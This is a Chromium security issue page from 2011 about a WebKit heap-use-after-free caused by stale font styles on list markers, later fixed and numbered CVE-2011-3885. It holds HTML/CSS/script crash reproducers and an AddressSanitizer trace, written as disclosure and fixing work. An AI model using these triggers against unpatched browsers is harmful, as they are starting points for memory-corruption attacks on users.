Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users
Status: Fixed
Owner:
Closed: Oct 2011
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
More stale styles in listmarkers
Project Member Reported by infe...@chromium.org, Sep 22 2011 Back to list
credit: miaubiz

<style>
li:before {
    content: "B";
}

@font-face { font-family: "A"; src: url(); }
body { font-family: A; }
</style>
  <li>C
  <ul> 
  </ul>
<script>
document.body.offsetTop;
document.body.style.color = "blue";
</script>
 
Comment 2 by miau...@gmail.com, Sep 23 2011
I think these are the same, but just in case :D
27b.html
536 bytes View Download
19b.html
416 bytes View Download
Comment 3 by miau...@gmail.com, Sep 25 2011
first-letter instead of before. same thing.
first-letter.html
150 bytes View Download
Thanks a lot Miaubiz for the additional testcases.

Mergedinto: 97994
Status: Duplicate
Mergedinto:
Status: Available
Reopening since generic fix is not enough. There are certain cases where we can't delay font retirement, so like we need to fix these security bugs alongwith functional issue.

Comment #9 From mitz@webkit.org 2011-09-28 13:26:48 PST (-) [reply] 
I can see a reclacStyle(Force) taking place, with a brand new FontSelector, after the old FontSelector’s document is cleared. So the issue remains that style recalc is not updating all renderers as it should. I can’t think of a reasonable way to defer the font deletion in cases like this. We should just fix the style recalc bugs.
Comment 7 by miau...@gmail.com, Sep 29 2011
putting this repro here where I think it belongs
crashing-sep29.html
609 bytes View Download
asan.txt
12.3 KB View Download
Labels: -reward-topanel reward-1000 reward-unpaid
@miaubiz: thanks for uncovering these list marker issues! $1000 for this one too.

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Comment 9 by miau...@gmail.com, Oct 3 2011
but it's not even fixed yet :|
Labels: -Mstone-14 Mstone-15
Oh balls. Looks like a mix up between myself and Inferno. Still, seems like it'll be good for the reward once we fix it :)
Comment 11 by miau...@gmail.com, Oct 4 2011
with vertical text orientation the stack changes

==4561== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffe38d050d at pc 0x7ffff3580ea2 bp 0x7fffffff69d0 sp 0x7fffffff68e0
READ of size 1 at 0x7fffe38d050d thread T0
    #0 0x7ffff3580ea2 in WebCore::InlineFlowBox::requiresIdeographicBaseline(WTF::HashMap<WebCore::InlineTextBox const*, std::pair<WTF::Vector<WebCore::SimpleFontData const*, 0ul>, WebCore::GlyphOverflow>, WTF::PtrHash<WebCore::InlineTextBox const*>, WTF::HashTraits<WebCore::InlineTextBox const*>, WTF::HashTraits<std::pair<WTF::Vector<WebCore::SimpleFontData const*, 0ul>, WebCore::GlyphOverflow> > > const&) const ???:0

<html>
  <head>
    <style>
      li:before {
        content: "B";
      }
      @font-face { font-family:"A"; src: url(); }
      li { font-family: A;
        -webkit-writing-mode:vertical-lr;
      }
    </style>
    C
    <style></style>
  </head>
  <body><li><ul></ul></li></body>
</html>
<script>
  document.designMode='on';
  document.execCommand('selectall');
  document.execCommand('italic');
</script>


asan1165.txt
11.3 KB View Download
1165.html
412 bytes View Download
Owner: infe...@chromium.org
Status: Started
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/97075
Labels: -Merge-Approved Merge-Merged merge-merged-874 SecImpacts-Stable SecImpacts-Beta
merged to m15 in r97086
Labels: CVE-2011-3885
Labels: -reward-unpaid
Payment in system, can take up to a couple of weeks.
Comment 17 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed..
Project Member Comment 18 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 19 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecSeverity-High -Mstone-15 -Stability-AddressSanitizer -SecImpacts-Stable -SecImpacts-Beta Cr-Content Security-Impact-Beta Security-Severity-High Security-Impact-Stable M-15 Type-Bug-Security Performance-Memory-AddressSanitizer
Project Member Comment 20 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 21 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 23 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 24 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 25 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 26 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 27 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 28 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 29 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 30 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment